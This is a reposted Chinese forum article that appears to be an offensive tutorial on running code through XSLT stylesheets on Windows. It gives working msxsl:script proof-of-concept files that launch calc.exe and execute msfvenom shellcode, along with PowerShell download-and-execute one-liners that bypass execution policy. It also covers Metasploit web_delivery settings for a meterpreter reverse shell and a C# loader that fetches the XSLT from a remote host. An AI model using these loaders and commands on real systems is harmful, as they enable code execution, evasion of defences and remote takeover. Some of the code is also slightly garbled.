KinKALaw 發表於 2017-7-9 13:04:38

Hack With XSLT

本帖最後由 KinKALaw 於 2017-7-9 13:11 編輯

作者:Evi1cg's blog
來源: 網絡收集
來源網址:請点擊


簡介XSLT全稱為拓展樣式表轉換語言,是一種用於將 XML 文檔轉換為 XHTML 文檔或其他 XML 文檔的語言。更多關於XSLT的教程可以參考W3school。關於XSLT的hack技巧之前已經有老師總結了WebShell系列(一)---XML,裡面詳細介紹了怎麼通過xslt構造webshell,並且可以看的出,通過XSLT可以執行很多類型的腳本,前段時間@Casey Smith公開了一個Execute C# From XSLT 的POC,感覺很有趣,所以簡單的研究了一下,也就有了此文。POCCasey Smith分享的poc如下:
calc.xslt<font size="3"><xsl:stylesheet version="2.0"
                xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:msxsl="urn:schemas-microsoft-com:xslt"
                xmlns:my="urn:MyModule">
  <msxsl:script implements-prefix="my" language="C#">
    public void Exec()
    {
      System.Diagnostics.Process.Start("Calc.exe");
    }
  </msxsl:script>
  <xsl:template match="data">
    <result>
      <xsl:value-of select="my:Exec()" />
    </result>
  </xsl:template>
</xsl:stylesheet></font>
其中xsl:stylesheet用來定義樣式表的根項目;version是其必須的屬性,用來規定樣式表的XSLT 版本;xmlns:xsl名稱空間,值固定;要使用msxsl:script元素,由於其屬於命名空間urn:schemas-microsoft-com:xslt,所以樣式表必須包含命名空間聲明;xmlns:my定義命名空間,名字隨意,需要注意的是下面的implements-prefix的值要與其一致。
msxsl:script定義如下:<msxsl:script language = "language-name" implements-prefix = "prefix of user namespace"> </msxsl:script>其中 msxsl 是綁定到命名空間 urn:schemas-microsoft-com:xslt的首碼。
language 屬性不是強制屬性,但如果指定該屬性,其值必須是下列值之一:C#、VB、JScript、JavaScript、VisualBasic 或 CSharp。 如果未指定,則預設語言為 JScript。
implements-prefix屬性是必選項。 此屬性用於聲明命名空間並將其與腳本塊關聯。xsl:template元素包含了當匹配指定節點時要應用的規則,match 屬性用於把範本關聯到某個 XML 元素,在這裡關聯了
example.xml,如下:<font size="3"><msxsl:script language = "language-name" implements-prefix = "prefix of user namespace"> </msxsl:script></font>
xsl:value-of 元素用於提取某個選定節點的值。在這裡也就是執行我們的函數。執行其POC,可以成功執行C#代碼。



如果想遠程加載執行可以這樣:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/xslt_poc/master/xslt_exec.ps1'); xslt_exec -xslt_url https://raw.githubusercontent.com/Ridter/xslt_poc/master/calc.xslt"


Exec Shellcode既然能執行C#,那怎麼執行ShellCode呢,其實很簡單,參考Casey Smith給出的代碼,修改代碼如下:
shellcode.xslt<xsl:stylesheet version="2.0"
                xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:msxsl="urn:schemas-microsoft-com:xslt"
                xmlns:shellcode="urn:MyModule">
  <msxsl:script implements-prefix="shellcode" language="C#">
  <msxsl:using namespace="System.Runtime.InteropServices" />  
<![CDATA[
     private static UInt32 MEM_COMMIT = 0x1000;         
     private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;         
     
     private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);         
     
     private static extern IntPtr CreateThread(            
        UInt32 lpThreadAttributes,
        UInt32 dwStackSize,
        UInt32 lpStartAddress,
        IntPtr param,
        UInt32 dwCreationFlags,
        ref UInt32 lpThreadId           
     );
     
     private static extern UInt32 WaitForSingleObject(           
        IntPtr hHandle,
        UInt32 dwMilliseconds
     );     
       public void Exec()
     {      
             #msfvenom --payload  windows/x64/exec CMD="calc" EXITFUNC=thread -f csharp
           byte[] shellcode = new new byte {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
0x63,0x00 };
              
           UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
           Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
           IntPtr hThread = IntPtr.Zero;
           UInt32 threadId = 0;
           IntPtr pinfo = IntPtr.Zero;
           hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
           WaitForSingleObject(hThread, 0xFFFFFFFF);            
    }
]]>
  </msxsl:script>
  <xsl:template match="data">
    <result>
      <xsl:value-of select="shellcode:Exec()" />
    </result>
  </xsl:template>
</xsl:stylesheet>shellcode可以通過msf來生成,具體生成方法在代碼裡已經給出,測試如下



  Exec JScript既然xslt可以執行多種腳本,當然也包括JScript,代碼如下:<xsl:stylesheet version="1.0"
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      xmlns:msxsl="urn:schemas-microsoft-com:xslt"
      xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
<![CDATA[
      function test(){
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
      }
    ]]>
      </msxsl:script>
  <xsl:template match="data">
    <result>
      <xsl:value-of select="user:test()" />
    </result>
  </xsl:template>
</xsl:stylesheet>遠端載入如下:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/xslt_poc/master/xslt_exec.ps1'); xslt_exec -xslt_url https://raw.githubusercontent.com/Ridter/xslt_poc/master/js_calc.xslt"之前Casey Smith分享過一個JS Dropper戳我。裡面多了一個調用certuil.exe對檔進行base64加解密,這裡當然也可以實現,具體代碼就不貼了,位址在這

Get Meterpreter說了這麼多,有人可能會問怎麼才能獲得meterpreter,其實很簡單,實現代碼在這。首先msf開啟監聽:use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.100.101
set lport 8889
set uripath xslt
exploit然後修改meter.xslt,之後用ps來載入就可以了。
Other當然,除了powershell可以調用xslt,其他語言也可以,這裡分享一個C#的,代碼如下:using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Xml.XPath;
using System.Xml.Xsl;
using System.Xml;
namespace ApplyXSLTToXML
{
    class Program
    {
        static void Main(string[] args)
        {
            string XMLFilePath = @"http://evi1cg.me/scripts/example.xml";
            string XSLTFilePath = @"http://evi1cg.me/scripts/calc.xslt";
            try
            {
                XsltSettings xslt_settings = new XsltSettings(false, true);
                xslt_settings.EnableScript = true;
                XslCompiledTransform xslt = new XslCompiledTransform();
                XmlUrlResolver resolver = new XmlUrlResolver();
                // Load documents
                xslt.Load(XSLTFilePath, xslt_settings, resolver);
                XPathDocument xmlPathDoc = new XPathDocument(XMLFilePath);
                XmlWriterSettings settings = new XmlWriterSettings();
                settings.Indent = true;
                settings.OmitXmlDeclaration = true;
                XmlWriter writer = XmlWriter.Create("output.xml", settings);
                xslt.Transform(xmlPathDoc,writer);
                writer.Close();
            }
            catch (Exception e)
            {
                Console.WriteLine("Error:");
                Console.WriteLine(e.Message);
            }
        }
    }
}其他語言的,如果需要,還希望小夥伴們自己動手寫寫。

頁: [1]
查看完整版本: Hack With XSLT